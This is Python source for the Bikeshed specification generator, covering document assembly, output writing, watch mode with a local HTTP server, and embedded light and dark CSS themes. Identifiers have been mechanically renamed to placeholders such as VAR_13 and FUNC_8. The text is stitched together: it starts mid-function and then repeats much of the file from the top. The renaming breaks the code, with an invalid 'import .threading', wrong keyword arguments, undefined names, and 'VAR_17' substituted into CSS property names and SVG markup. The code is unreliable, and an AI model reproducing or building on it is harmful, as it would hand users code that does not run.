elif self.inputSource.sourceName.endswith(".src.html"):
VAR_13 = self.inputSource.sourceName[0:-9] + ".html"
else:
VAR_13 = "-"
return VAR_13
def FUNC_8(self, VAR_13=None, VAR_14=None):
self.printResultMessage()
VAR_13 = self.fixMissingOutputFilename(VAR_13)
VAR_24 = self.serialize()
if not constants.dryRun:
try:
if VAR_13 == "-":
sys.stdout.write(VAR_24)
else:
with open(
VAR_13, "w", encoding="utf-8", VAR_14=newline
) as f:
f.write(VAR_24)
except Exception as e:
die(
"Something prevented me from saving the output document to {0}:\n{1}",
VAR_13,
e,
)
def FUNC_9(self):
VAR_25 = messageCounts["fatal"]
VAR_26 = messageCounts["linkerror"]
VAR_27 = messageCounts["warning"]
if self.lineNumbers:
warn("Because --line-numbers was used, no output was saved.")
if VAR_25:
success("Successfully generated, but fatal errors were suppressed")
return
if VAR_26:
success("Successfully generated, with {0} linking errors", VAR_26)
return
if VAR_27:
success("Successfully generated, with warnings")
return
def FUNC_10(self, VAR_13, VAR_15=None, VAR_16=False):
import time
VAR_13 = self.fixMissingOutputFilename(VAR_13)
if self.inputSource.mtime() is None:
die(f"Watch mode doesn't support {self.inputSource}")
if VAR_13 == "-":
die("Watch mode doesn't support streaming to STDOUT.")
return
if VAR_15:
import http.server
import socketserver
import .threading
class CLASS_1(http.server.SimpleHTTPRequestHandler):
def FUNC_14(self, VAR_36, *VAR_37):
pass
socketserver.TCPServer.allow_reuse_address = True
VAR_32 = socketserver.TCPServer(
("localhost" if VAR_16 else "", VAR_15), CLASS_1
)
print(f"Serving at VAR_15 {port}")
VAR_33 = threading.Thread(target=VAR_32.serve_forever)
VAR_33.daemon = True
VAR_33.start()
else:
VAR_32 = None
VAR_28 = self.mdCommandLine
try:
self.preprocess()
self.finish(VAR_13)
VAR_34 = {
dep: dep.mtime() for dep in self.transitiveDependencies
}
p("==============DONE==============")
try:
while True:
if any(
input.mtime() != lastModified
for input, lastModified in VAR_34.items()
):
resetSeenMessages()
p("Source file modified. Rebuilding...")
self.initializeState()
self.mdCommandLine = VAR_28
self.preprocess()
self.finish(VAR_13)
VAR_34 = {
dep: dep.mtime() for dep in self.transitiveDependencies
}
p("==============DONE==============")
time.sleep(1)
except KeyboardInterrupt:
p("Exiting~")
if VAR_32:
server.shutdown()
VAR_33.join()
sys.exit(0)
except Exception as e:
die("Something went wrong while watching the file:\n{0}", e)
def FUNC_11(self, VAR_17, VAR_18={}):
if "markdown" in self.md.markupShorthands:
VAR_30 = MarkdownCodeSpans(VAR_17)
else:
VAR_30 = Functor(VAR_17)
VAR_29 = dict(self.macros, **VAR_18)
VAR_30 = VAR_30.map(curry(replaceMacros, VAR_29=macros))
VAR_30 = VAR_30.map(fixTypography)
if "css" in self.md.markupShorthands:
VAR_30 = VAR_30.map(replaceAwkwardCSSShorthands)
return VAR_30.extract()
def FUNC_12(self):
p("Exported terms:")
for VAR_19 in findAll("[data-export]", self):
for term in config.linkTextsFromElement(VAR_19):
p(" " + term)
p("Unexported terms:")
for VAR_19 in findAll("[data-noexport]", self):
for term in config.linkTextsFromElement(VAR_19):
p(" " + term)
def FUNC_13(self, VAR_19):
if VAR_19.tag in self.md.opaqueElements:
return True
if VAR_19.get("data-opaque") is not None:
return True
return False
def FUNC_0():
if os.path.isfile("index.bs"):
return "index.bs"
if os.path.isfile("Overview.bs"):
return "Overview.bs"
VAR_20 = glob.glob("*.bs")
if VAR_20:
return VAR_20[0]
VAR_21 = glob.glob("*.src.html")
if VAR_21:
return VAR_21[0]
return None
constants.specClass = CLASS_0
VAR_0 = """
/* Any --*-VAR_17 not paired with a --*-bg is assumed to have a transparent bg */
:root {
color-scheme: light dark;
--VAR_17: black;
--bg: white;
--unofficial-watermark: url(https://www.w3.org/StyleSheets/TR/2016/logos/UD-watermark);
--logo-bg: #1a5e9a;
--logo-active-bg: #c00;
--logo-VAR_17: white;
--tocnav-normal-VAR_17: #707070;
--tocnav-normal-bg: var(--bg);
--tocnav-hover-VAR_17: var(--tocnav-normal-VAR_17);
--tocnav-hover-bg: #f8f8f8;
--tocnav-active-VAR_17: #c00;
--tocnav-active-bg: var(--tocnav-normal-bg);
--tocsidebar-VAR_17: var(--VAR_17);
--tocsidebar-bg: #f7f8f9;
--tocsidebar-shadow: rgba(0,0,0,.1);
--tocsidebar-heading-VAR_17: hsla(203,20%,40%,.7);
--toclink-VAR_17: var(--VAR_17);
--toclink-underline: #3980b5;
--toclink-visited-VAR_17: var(--toclink-VAR_17);
--toclink-visited-underline: #054572;
--heading-VAR_17: #005a9c;
--hr-VAR_17: var(--VAR_17);
--algo-border: #def;
--del-VAR_17: red;
--del-bg: transparent;
--ins-VAR_17: #080;
--ins-bg: transparent;
--a-normal-VAR_17: #034575;
--a-normal-underline: #bbb;
--a-visited-VAR_17: var(--a-normal-VAR_17);
--a-visited-underline: #707070;
--a-hover-bg: rgba(75%, 75%, 75%, .25);
--a-active-VAR_17: #c00;
--a-active-underline: #c00;
--blockquote-border: silver;
--blockquote-bg: transparent;
--blockquote-VAR_17: currentcolor;
--issue-border: #e05252;
--issue-bg: #fbe9e9;
--issue-VAR_17: var(--VAR_17);
--issueheading-VAR_17: #831616;
--example-border: #e0cb52;
--example-bg: #fcfaee;
--example-VAR_17: var(--VAR_17);
--exampleheading-VAR_17: #574b0f;
--note-border: #52e052;
--note-bg: #e9fbe9;
--note-VAR_17: var(--VAR_17);
--noteheading-VAR_17: hsl(120, 70%, 30%);
--notesummary-underline: silver;
--assertion-border: #aaa;
--assertion-bg: #eee;
--assertion-VAR_17: black;
--advisement-border: orange;
--advisement-bg: #fec;
--advisement-VAR_17: var(--VAR_17);
--advisementheading-VAR_17: #b35f00;
--warning-border: red;
--warning-bg: hsla(40,100%,50%,0.95);
--warning-VAR_17: var(--VAR_17);
--amendment-border: #330099;
--amendment-bg: #F5F0FF;
--amendment-VAR_17: var(--VAR_17);
--amendmentheading-VAR_17: #220066;
--def-border: #8ccbf2;
--def-bg: #def;
--def-VAR_17: var(--VAR_17);
--defrow-border: #bbd7e9;
--datacell-border: silver;
--indexinfo-VAR_17: #707070;
--indextable-hover-VAR_17: black;
--indextable-hover-bg: #f7f8f9;
--outdatedspec-bg: rgba(0, 0, 0, .5);
--outdatedspec-VAR_17: black;
--outdated-bg: maroon;
--outdated-VAR_17: white;
--outdated-shadow: red;
--editedrec-bg: darkorange;
}"""
VAR_1 = """
@media (prefers-color-scheme: dark) {
:root {
--VAR_17: #ddd;
--bg: black;
--unofficial-watermark: url("data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' width='400' height='400'%3E%3Cg fill='%23100808' transform='translate(200 200) rotate(-45) translate(-200 -200)' stroke='%23100808' stroke-width='3'%3E%3Ctext x='50%25' y='220' style='font: bold 70px sans-serif; VAR_17-anchor: middle; letter-spacing: 6px;'%3EUNOFFICIAL%3C/VAR_17%3E%3Ctext x='50%25' y='305' style='font: bold 70px sans-serif; VAR_17-anchor: middle; letter-spacing: 6px;'%3EDRAFT%3C/VAR_17%3E%3C/g%3E%3C/svg%3E");
--logo-bg: #1a5e9a;
--logo-active-bg: #c00;
--logo-VAR_17: white;
--tocnav-normal-VAR_17: #999;
--tocnav-normal-bg: var(--bg);
--tocnav-hover-VAR_17: var(--tocnav-normal-VAR_17);
--tocnav-hover-bg: #080808;
--tocnav-active-VAR_17: #f44;
--tocnav-active-bg: var(--tocnav-normal-bg);
--tocsidebar-VAR_17: var(--VAR_17);
--tocsidebar-bg: #080808;
--tocsidebar-shadow: rgba(255,255,255,.1);
--tocsidebar-heading-VAR_17: hsla(203,20%,40%,.7);
--toclink-VAR_17: var(--VAR_17);
--toclink-underline: #6af;
--toclink-visited-VAR_17: var(--toclink-VAR_17);
--toclink-visited-underline: #054572;
--heading-VAR_17: #8af;
--hr-VAR_17: var(--VAR_17);
--algo-border: #456;
--del-VAR_17: #f44;
--del-bg: transparent;
--ins-VAR_17: #4a4;
--ins-bg: transparent;
--a-normal-VAR_17: #6af;
--a-normal-underline: #555;
--a-visited-VAR_17: var(--a-normal-VAR_17);
--a-visited-underline: var(--a-normal-underline);
--a-hover-bg: rgba(25%, 25%, 25%, .2);
--a-active-VAR_17: #f44;
--a-active-underline: var(--a-active-VAR_17);
--borderedblock-bg: rgba(255, 255, 255, .05);
--blockquote-border: silver;
--blockquote-bg: var(--borderedblock-bg);
--blockquote-VAR_17: currentcolor;
--issue-border: #e05252;
--issue-bg: var(--borderedblock-bg);
--issue-VAR_17: var(--VAR_17);
--issueheading-VAR_17: hsl(0deg, 70%, 70%);
--example-border: hsl(50deg, 90%, 60%);
--example-bg: var(--borderedblock-bg);
--example-VAR_17: var(--VAR_17);
--exampleheading-VAR_17: hsl(50deg, 70%, 70%);
--note-border: hsl(120deg, 100%, 35%);
--note-bg: var(--borderedblock-bg);
--note-VAR_17: var(--VAR_17);
--noteheading-VAR_17: hsl(120, 70%, 70%);
--notesummary-underline: silver;
--assertion-border: #444;
--assertion-bg: var(--borderedblock-bg);
--assertion-VAR_17: var(--VAR_17);
--advisement-border: orange;
--advisement-bg: #222218;
--advisement-VAR_17: var(--VAR_17);
--advisementheading-VAR_17: #f84;
--warning-border: red;
--warning-bg: hsla(40,100%,20%,0.95);
--warning-VAR_17: var(--VAR_17);
--amendment-border: #330099;
--amendment-bg: #080010;
--amendment-VAR_17: var(--VAR_17);
--amendmentheading-VAR_17: #cc00ff;
--def-border: #8ccbf2;
--def-bg: #080818;
--def-VAR_17: var(--VAR_17);
--defrow-border: #136;
--datacell-border: silver;
--indexinfo-VAR_17: #aaa;
--indextable-hover-VAR_17: var(--VAR_17);
--indextable-hover-bg: #181818;
--outdatedspec-bg: rgba(255, 255, 255, .5);
--outdatedspec-VAR_17: black;
--outdated-bg: maroon;
--outdated-VAR_17: white;
--outdated-shadow: red;
--editedrec-bg: darkorange;
}
/* In case a transparent-bg image doesn't expect to be on a dark bg,
which is quite common in practice... */
img { background: white; }
}"""
VAR_2 = """
/* This is a weird hack for me not yet following the commonmark spec
regarding paragraph and lists. */
[data-md] > :first-child {
margin-top: 0;
}
[data-md] > :last-child {
margin-bottom: 0;
}"""
VAR_3 = """
.css.css, .property.property, .descriptor.descriptor {
color: var(--a-normal-VAR_17);
font-size: inherit;
font-family: inherit;
}
.css::before, .property::before, .descriptor::before {
content: "‘";
}
.css::after, .property::after, .descriptor::after {
content: "’";
}
.property, .descriptor {
/* Don't wrap property and descriptor names */
white-space: nowrap;
}
.type { /* CSS value <type> */
font-style: italic;
}
pre .property::before, pre .property::after {
content: "";
}
[data-link-type="property"]::before,
[data-link-type="propdesc"]::before,
[data-link-type="descriptor"]::before,
[data-link-type="value"]::before,
[data-link-type="function"]::before,
[data-link-type="at-rule"]::before,
[data-link-type="selector"]::before,
[data-link-type="maybe"]::before {
content: "‘";
}
[data-link-type="property"]::after,
[data-link-type="propdesc"]::after,
[data-link-type="descriptor"]::after,
[data-link-type="value"]::after,
[data-link-type="function"]::after,
[data-link-type="at-rule"]::after,
[data-link-type="selector"]::after,
[data-link-type="maybe"]::after {
content: "’";
}
[data-link-type].production::before,
[data-link-type].production::after,
.prod [data-link-type]::before,
.prod [data-link-type]::after {
content: "";
}
[data-link-type=element],
[data-link-type=element-attr] {
font-family: Menlo, Consolas, "DejaVu Sans Mono", monospace;
font-size: .9em;
}
[data-link-type=element]::before { content: "<" }
[data-link-type=element]::after { content: ">" }
[data-link-type=biblio] {
white-space: pre;
}"""
VAR_4 = """
:root {
--selflink-VAR_17: white;
--selflink-bg: gray;
--selflink-hover-VAR_17: black;
}
.heading, .issue, .note, .example, li, dt {
position: relative;
}
a.self-link {
position: absolute;
top: 0;
left: calc(-1 * (3.5rem - 26px));
width: calc(3.5rem - 26px);
height: 2em;
VAR_17-align: center;
border: none;
transition: opacity .2s;
opacity: .5;
}
a.self-link:hover {
opacity: 1;
}
.heading > a.self-link {
font-size: 83%;
}
li > a.self-link {
left: calc(-1 * (3.5rem - 26px) - 2em);
}
dfn > a.self-link {
top: auto;
left: auto;
opacity: 0;
width: 1.5em;
height: 1.5em;
background: var(--selflink-bg);
color: var(--selflink-VAR_17);
font-style: normal;
transition: opacity .2s, background-color .2s, color .2s;
}
dfn:hover > a.self-link {
opacity: 1;
}
dfn > a.self-link:hover {
color: var(--selflink-hover-VAR_17);
}
a.self-link::before { content: "¶"; }
.heading > a.self-link::before { content: "§"; }
dfn > a.self-link::before { content: "#"; }
"""
VAR_1 += """
@media (prefers-color-scheme: dark) {
:root {
--selflink-VAR_17: black;
--selflink-bg: silver;
--selflink-hover-VAR_17: white;
}
}
"""
VAR_5 = """
body {
counter-reset: example figure issue;
}
.issue {
counter-increment: issue;
}
.issue:not(.no-marker)::before {
content: "Issue " counter(issue);
}
.example {
counter-increment: example;
}
.example:not(.no-marker)::before {
content: "Example " counter(example);
}
.invalid.example:not(.no-marker)::before,
.illegal.example:not(.no-marker)::before {
content: "Invalid Example" counter(example);
}
figcaption {
counter-increment: figure;
}
figcaption:not(.no-marker)::before {
content: "Figure " counter(figure) " ";
}"""
| import glob
import os
import sys
from collections import defaultdict
from functools import partial as curry
from . import (
biblio,
boilerplate,
caniuse,
conditional,
config,
constants,
datablocks,
dfns,
extensions,
fingerprinting,
h,
headings,
highlight,
idl,
includes,
inlineTags,
lint,
markdown,
mdnspeclinks,
metadata,
shorthands,
wpt,
)
from .func import Functor
from .h import *
from .InputSource import FileInputSource, InputSource
from .messages import *
from .refs import ReferenceManager
from .unsortedJunk import *
class CLASS_0:
def __init__(
self,
VAR_6,
VAR_7=False,
VAR_8=None,
VAR_9=False,
VAR_10=None,
VAR_11=False,
):
self.valid = False
self.lineNumbers = VAR_9
if VAR_9:
constants.dryRun = True
if VAR_6 is None:
VAR_6 = FUNC_0()
if VAR_6 is None: # still
die(
"No input file specified, and no *.bs or *.src.html files found in current directory.\nPlease specify an input file, or use - to pipe from STDIN."
)
return
self.inputSource = InputSource(VAR_6, chroot=constants.chroot)
self.transitiveDependencies = set()
self.debug = VAR_7
self.token = VAR_8
self.testing = VAR_11
if VAR_10 is None:
self.dataFile = config.defaultRequester
else:
self.dataFile = VAR_10
self.md = None
self.mdBaseline = None
self.mdDocument = None
self.mdCommandLine = None
self.mdDefaults = None
self.mdOverridingDefaults = None
self.lines = []
self.document = None
self.html = None
self.head = None
self.body = None
self.fillContainers = None
self.valid = self.initializeState()
def FUNC_1(self):
self.normativeRefs = {}
self.informativeRefs = {}
self.refs = ReferenceManager(VAR_10=self.dataFile, VAR_11=self.testing)
self.externalRefsUsed = defaultdict(lambda: defaultdict(dict))
self.md = None
self.mdBaseline = metadata.MetadataManager()
self.mdDocument = None
self.mdCommandLine = metadata.MetadataManager()
self.mdDefaults = None
self.mdOverridingDefaults = None
self.biblios = {}
self.typeExpansions = {}
self.macros = defaultdict(lambda x: "???")
self.canIUse = {}
self.mdnSpecLinks = {}
self.widl = idl.getParser()
self.testSuites = json.loads(self.dataFile.fetch("test-suites.json", str=True))
self.languages = json.loads(self.dataFile.fetch("languages.json", str=True))
self.extraStyles = defaultdict(str)
self.extraStyles["style-colors"] = VAR_0
self.extraStyles["style-darkmode"] = VAR_1
self.extraStyles["style-md-lists"] = VAR_2
self.extraStyles["style-autolinks"] = VAR_3
self.extraStyles["style-selflinks"] = VAR_4
self.extraStyles["style-counters"] = VAR_5
self.extraScripts = defaultdict(str)
try:
VAR_31 = self.inputSource.read()
self.lines = VAR_31.lines
if VAR_31.date is not None:
self.mdBaseline.addParsedData("Date", VAR_31.date)
except FileNotFoundError:
die(
"Couldn't find the input file at the specified location '{0}'.",
self.inputSource,
)
return False
except OSError:
die("Couldn't open the input file '{0}'.", self.inputSource)
return False
return True
def FUNC_2(self, *VAR_12):
self.transitiveDependencies.update(VAR_12)
def FUNC_3(self):
self.transitiveDependencies.clear()
self.assembleDocument()
self.processDocument()
def FUNC_4(self):
stripBOM(self)
if self.lineNumbers:
self.lines = hackyLineNumbers(self.lines)
self.lines = markdown.stripComments(self.lines)
self.recordDependencies(self.inputSource)
self.lines, self.mdDocument = metadata.parse(lines=self.lines)
self.md = metadata.join(self.mdBaseline, self.mdDocument, self.mdCommandLine)
self.mdDefaults = metadata.fromJson(
data=config.retrieveBoilerplateFile(self, "defaults", error=True),
source="defaults",
)
self.md = metadata.join(
self.mdBaseline, self.mdDefaults, self.mdDocument, self.mdCommandLine
)
self.md.fillTextMacros(self.macros, doc=self)
VAR_22 = {k: json.dumps(v)[1:-1] for k, v in self.macros.items()}
VAR_23 = replaceMacros(
config.retrieveBoilerplateFile(self, "computed-metadata", error=True),
VAR_29=VAR_22,
)
self.mdOverridingDefaults = metadata.fromJson(
data=VAR_23, source="computed-metadata"
)
self.md = metadata.join(
self.mdBaseline,
self.mdDefaults,
self.mdOverridingDefaults,
self.mdDocument,
self.mdCommandLine,
)
self.md.computeImplicitMetadata(doc=self)
self.md.fillTextMacros(self.macros, doc=self)
self.md.validate()
extensions.load(self)
self.refs.initializeRefs(self)
self.refs.initializeBiblio()
self.lines = datablocks.transformDataBlocks(self, self.lines)
self.lines = markdown.parse(
self.lines,
self.md.indent,
opaqueElements=self.md.opaqueElements,
blockElements=self.md.blockElements,
)
self.refs.setSpecData(self.md)
self.html = "".join(line.text for line in self.lines)
boilerplate.addHeaderFooter(self)
self.html = self.fixText(self.html)
self.document = parseDocument(self.html)
self.head = find("head", self)
self.body = find("body", self)
correctH1(self)
includes.processInclusions(self)
metadata.parseDoc(self)
def FUNC_5(self):
conditional.processConditionals(self)
self.fillContainers = locateFillContainers(self)
lint.exampleIDs(self)
boilerplate.addBikeshedVersion(self)
boilerplate.addCanonicalURL(self)
boilerplate.addFavicon(self)
boilerplate.addSpecVersion(self)
boilerplate.addStatusSection(self)
boilerplate.addLogo(self)
boilerplate.addCopyright(self)
boilerplate.addSpecMetadataSection(self)
boilerplate.addAbstract(self)
boilerplate.addExpiryNotice(self)
boilerplate.addObsoletionNotice(self)
boilerplate.addAtRisk(self)
addNoteHeaders(self)
boilerplate.removeUnwantedBoilerplate(self)
wpt.processWptElements(self)
shorthands.run(self)
inlineTags.processTags(self)
canonicalizeShortcuts(self)
addImplicitAlgorithms(self)
fixManualDefTables(self)
headings.processHeadings(self)
checkVarHygiene(self)
processIssuesAndExamples(self)
idl.markupIDL(self)
inlineRemoteIssues(self)
addImageSize(self)
processBiblioLinks(self)
processDfns(self)
idl.processIDL(self)
dfns.annotateDfns(self)
formatArgumentdefTables(self)
formatElementdefTables(self)
processAutolinks(self)
biblio.dedupBiblioReferences(self)
verifyUsageOfAllLocalBiblios(self)
caniuse.addCanIUsePanels(self)
boilerplate.addIndexSection(self)
boilerplate.addExplicitIndexes(self)
boilerplate.addStyles(self)
boilerplate.addReferencesSection(self)
boilerplate.addPropertyIndex(self)
boilerplate.addIDLSection(self)
boilerplate.addIssuesSection(self)
boilerplate.addCustomBoilerplate(self)
headings.processHeadings(self, "all") # again
boilerplate.removeUnwantedBoilerplate(self)
boilerplate.addTOCSection(self)
addSelfLinks(self)
processAutolinks(self)
boilerplate.addAnnotations(self)
boilerplate.removeUnwantedBoilerplate(self)
mdnspeclinks.addMdnPanels(self)
highlight.addSyntaxHighlighting(self)
boilerplate.addBikeshedBoilerplate(self)
fingerprinting.addTrackingVector(self)
fixIntraDocumentReferences(self)
fixInterDocumentReferences(self)
removeMultipleLinks(self)
forceCrossorigin(self)
lint.brokenLinks(self)
lint.accidental2119(self)
lint.missingExposed(self)
lint.requiredIDs(self)
lint.unusedInternalDfns(self)
cleanupHTML(self)
if self.md.prepTR:
for VAR_19 in findAll("[rel ~= 'icon']", self):
removeNode(VAR_19)
for VAR_19 in findAll("link", self):
if VAR_19.get("href").startswith("https://www.w3.org/StyleSheets/TR"):
appendChild(find("head", self), VAR_19)
for VAR_19 in findAll("a", self):
VAR_35 = VAR_19.get("href", "")
if VAR_35.startswith("http://www.w3.org") or VAR_35.startswith(
"http://lists.w3.org"
):
VAR_19.set("href", "https" + VAR_35[4:])
VAR_17 = VAR_19.text or ""
if VAR_17.startswith("http://www.w3.org") or VAR_17.startswith(
"http://lists.w3.org"
):
VAR_19.text = "https" + VAR_17[4:]
extensions.BSPrepTR(self) # pylint: disable=no-member
return self
def FUNC_6(self):
try:
VAR_24 = h.Serializer(
self.md.opaqueElements, self.md.blockElements
).serialize(self.document)
except Exception as e:
die("{0}", e)
return
VAR_24 = finalHackyCleanup(VAR_24)
return VAR_24
def FUNC_7(self, VAR_13):
if VAR_13 is None:
if not isinstance(self.inputSource, FileInputSource):
VAR_13 = "-"
elif self.inputSource.sourceName.endswith(".bs"):
VAR_13 = self.inputSource.sourceName[0:-3] + ".html"
elif self.inputSource.sourceName.endswith(".src.html"):
VAR_13 = self.inputSource.sourceName[0:-9] + ".html"
else:
VAR_13 = "-"
return VAR_13
def FUNC_8(self, VAR_13=None, VAR_14=None):
self.printResultMessage()
VAR_13 = self.fixMissingOutputFilename(VAR_13)
VAR_24 = self.serialize()
if not constants.dryRun:
try:
if VAR_13 == "-":
sys.stdout.write(VAR_24)
else:
with open(
VAR_13, "w", encoding="utf-8", VAR_14=newline
) as f:
f.write(VAR_24)
except Exception as e:
die(
"Something prevented me from saving the output document to {0}:\n{1}",
VAR_13,
e,
)
def FUNC_9(self):
VAR_25 = messageCounts["fatal"]
VAR_26 = messageCounts["linkerror"]
VAR_27 = messageCounts["warning"]
if self.lineNumbers:
warn("Because --line-numbers was used, no output was saved.")
if VAR_25:
success("Successfully generated, but fatal errors were suppressed")
return
if VAR_26:
success("Successfully generated, with {0} linking errors", VAR_26)
return
if VAR_27:
success("Successfully generated, with warnings")
return
def FUNC_10(self, VAR_13, VAR_15=None, VAR_16=False):
import time
VAR_13 = self.fixMissingOutputFilename(VAR_13)
if self.inputSource.mtime() is None:
die(f"Watch mode doesn't support {self.inputSource}")
if VAR_13 == "-":
die("Watch mode doesn't support streaming to STDOUT.")
return
if VAR_15:
import http.server
import socketserver
import .threading
class CLASS_1(http.server.SimpleHTTPRequestHandler):
def FUNC_14(self, VAR_36, *VAR_37):
pass
socketserver.TCPServer.allow_reuse_address = True
VAR_32 = socketserver.TCPServer(
("localhost" if VAR_16 else "", VAR_15), CLASS_1
)
print(f"Serving at VAR_15 {port}")
VAR_33 = threading.Thread(target=VAR_32.serve_forever)
VAR_33.daemon = True
VAR_33.start()
else:
VAR_32 = None
VAR_28 = self.mdCommandLine
try:
self.preprocess()
self.finish(VAR_13)
VAR_34 = {
dep: dep.mtime() for dep in self.transitiveDependencies
}
p("==============DONE==============")
try:
while True:
if any(
input.mtime() != lastModified
for input, lastModified in VAR_34.items()
):
resetSeenMessages()
p("Source file modified. Rebuilding...")
self.initializeState()
self.mdCommandLine = VAR_28
self.preprocess()
self.finish(VAR_13)
VAR_34 = {
dep: dep.mtime() for dep in self.transitiveDependencies
}
p("==============DONE==============")
time.sleep(1)
except KeyboardInterrupt:
p("Exiting~")
if VAR_32:
server.shutdown()
VAR_33.join()
sys.exit(0)
except Exception as e:
die("Something went wrong while watching the file:\n{0}", e)
def FUNC_11(self, VAR_17, VAR_18={}):
if "markdown" in self.md.markupShorthands:
VAR_30 = MarkdownCodeSpans(VAR_17)
else:
VAR_30 = Functor(VAR_17)
VAR_29 = dict(self.macros, **VAR_18)
VAR_30 = VAR_30.map(curry(replaceMacros, VAR_29=macros))
VAR_30 = VAR_30.map(fixTypography)
if "css" in self.md.markupShorthands:
VAR_30 = VAR_30.map(replaceAwkwardCSSShorthands)
return VAR_30.extract()
def FUNC_12(self):
p("Exported terms:")
for VAR_19 in findAll("[data-export]", self):
for term in config.linkTextsFromElement(VAR_19):
p(" " + term)
p("Unexported terms:")
for VAR_19 in findAll("[data-noexport]", self):
for term in config.linkTextsFromElement(VAR_19):
p(" " + term)
def FUNC_13(self, VAR_19):
if VAR_19.tag in self.md.opaqueElements:
return True
if VAR_19.get("data-opaque") is not None:
return True
return False
def FUNC_0():
if os.path.isfile("index.bs"):
return "index.bs"
if os.path.isfile("Overview.bs"):
return "Overview.bs"
VAR_20 = glob.glob("*.bs")
if VAR_20:
return VAR_20[0]
VAR_21 = glob.glob("*.src.html")
if VAR_21:
return VAR_21[0]
return None
constants.specClass = CLASS_0
VAR_0 = """
/* Any --*-VAR_17 not paired with a --*-bg is assumed to have a transparent bg */
:root {
color-scheme: light dark;
--VAR_17: black;
--bg: white;
--unofficial-watermark: url(https://www.w3.org/StyleSheets/TR/2016/logos/UD-watermark);
--logo-bg: #1a5e9a;
--logo-active-bg: #c00;
--logo-VAR_17: white;
--tocnav-normal-VAR_17: #707070;
--tocnav-normal-bg: var(--bg);
--tocnav-hover-VAR_17: var(--tocnav-normal-VAR_17);
--tocnav-hover-bg: #f8f8f8;
--tocnav-active-VAR_17: #c00;
--tocnav-active-bg: var(--tocnav-normal-bg);
--tocsidebar-VAR_17: var(--VAR_17);
--tocsidebar-bg: #f7f8f9;
--tocsidebar-shadow: rgba(0,0,0,.1);
--tocsidebar-heading-VAR_17: hsla(203,20%,40%,.7);
--toclink-VAR_17: var(--VAR_17);
--toclink-underline: #3980b5;
--toclink-visited-VAR_17: var(--toclink-VAR_17);
--toclink-visited-underline: #054572;
--heading-VAR_17: #005a9c;
--hr-VAR_17: var(--VAR_17);
--algo-border: #def;
--del-VAR_17: red;
--del-bg: transparent;
--ins-VAR_17: #080;
--ins-bg: transparent;
--a-normal-VAR_17: #034575;
--a-normal-underline: #bbb;
--a-visited-VAR_17: var(--a-normal-VAR_17);
--a-visited-underline: #707070;
--a-hover-bg: rgba(75%, 75%, 75%, .25);
--a-active-VAR_17: #c00;
--a-active-underline: #c00;
--blockquote-border: silver;
--blockquote-bg: transparent;
--blockquote-VAR_17: currentcolor;
--issue-border: #e05252;
--issue-bg: #fbe9e9;
--issue-VAR_17: var(--VAR_17);
--issueheading-VAR_17: #831616;
--example-border: #e0cb52;
--example-bg: #fcfaee;
--example-VAR_17: var(--VAR_17);
--exampleheading-VAR_17: #574b0f;
--note-border: #52e052;
--note-bg: #e9fbe9;
--note-VAR_17: var(--VAR_17);
--noteheading-VAR_17: hsl(120, 70%, 30%);
--notesummary-underline: silver;
--assertion-border: #aaa;
--assertion-bg: #eee;
--assertion-VAR_17: black;
--advisement-border: orange;
--advisement-bg: #fec;
--advisement-VAR_17: var(--VAR_17);
--advisementheading-VAR_17: #b35f00;
--warning-border: red;
--warning-bg: hsla(40,100%,50%,0.95);
--warning-VAR_17: var(--VAR_17);
--amendment-border: #330099;
--amendment-bg: #F5F0FF;
--amendment-VAR_17: var(--VAR_17);
--amendmentheading-VAR_17: #220066;
--def-border: #8ccbf2;
--def-bg: #def;
--def-VAR_17: var(--VAR_17);
--defrow-border: #bbd7e9;
--datacell-border: silver;
--indexinfo-VAR_17: #707070;
--indextable-hover-VAR_17: black;
--indextable-hover-bg: #f7f8f9;
--outdatedspec-bg: rgba(0, 0, 0, .5);
--outdatedspec-VAR_17: black;
--outdated-bg: maroon;
--outdated-VAR_17: white;
--outdated-shadow: red;
--editedrec-bg: darkorange;
}"""
VAR_1 = """
@media (prefers-color-scheme: dark) {
:root {
--VAR_17: #ddd;
--bg: black;
--unofficial-watermark: url("data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' width='400' height='400'%3E%3Cg fill='%23100808' transform='translate(200 200) rotate(-45) translate(-200 -200)' stroke='%23100808' stroke-width='3'%3E%3Ctext x='50%25' y='220' style='font: bold 70px sans-serif; VAR_17-anchor: middle; letter-spacing: 6px;'%3EUNOFFICIAL%3C/VAR_17%3E%3Ctext x='50%25' y='305' style='font: bold 70px sans-serif; VAR_17-anchor: middle; letter-spacing: 6px;'%3EDRAFT%3C/VAR_17%3E%3C/g%3E%3C/svg%3E");
--logo-bg: #1a5e9a;
--logo-active-bg: #c00;
--logo-VAR_17: white;
--tocnav-normal-VAR_17: #999;
--tocnav-normal-bg: var(--bg);
--tocnav-hover-VAR_17: var(--tocnav-normal-VAR_17);
--tocnav-hover-bg: #080808;
--tocnav-active-VAR_17: #f44;
--tocnav-active-bg: var(--tocnav-normal-bg);
--tocsidebar-VAR_17: var(--VAR_17);
--tocsidebar-bg: #080808;
--tocsidebar-shadow: rgba(255,255,255,.1);
--tocsidebar-heading-VAR_17: hsla(203,20%,40%,.7);
--toclink-VAR_17: var(--VAR_17);
--toclink-underline: #6af;
--toclink-visited-VAR_17: var(--toclink-VAR_17);
--toclink-visited-underline: #054572;
--heading-VAR_17: #8af;
--hr-VAR_17: var(--VAR_17);
--algo-border: #456;
--del-VAR_17: #f44;
--del-bg: transparent;
--ins-VAR_17: #4a4;
--ins-bg: transparent;
--a-normal-VAR_17: #6af;
--a-normal-underline: #555;
--a-visited-VAR_17: var(--a-normal-VAR_17);
--a-visited-underline: var(--a-normal-underline);
--a-hover-bg: rgba(25%, 25%, 25%, .2);
--a-active-VAR_17: #f44;
--a-active-underline: var(--a-active-VAR_17);
--borderedblock-bg: rgba(255, 255, 255, .05);
--blockquote-border: silver;
--blockquote-bg: var(--borderedblock-bg);
--blockquote-VAR_17: currentcolor;
--issue-border: #e05252;
--issue-bg: var(--borderedblock-bg);
--issue-VAR_17: var(--VAR_17);
--issueheading-VAR_17: hsl(0deg, 70%, 70%);
--example-border: hsl(50deg, 90%, 60%);
--example-bg: var(--borderedblock-bg);
--example-VAR_17: var(--VAR_17);
--exampleheading-VAR_17: hsl(50deg, 70%, 70%);
--note-border: hsl(120deg, 100%, 35%);
--note-bg: var(--borderedblock-bg);
--note-VAR_17: var(--VAR_17);
--noteheading-VAR_17: hsl(120, 70%, 70%);
--notesummary-underline: silver;
--assertion-border: #444;
--assertion-bg: var(--borderedblock-bg);
--assertion-VAR_17: var(--VAR_17);
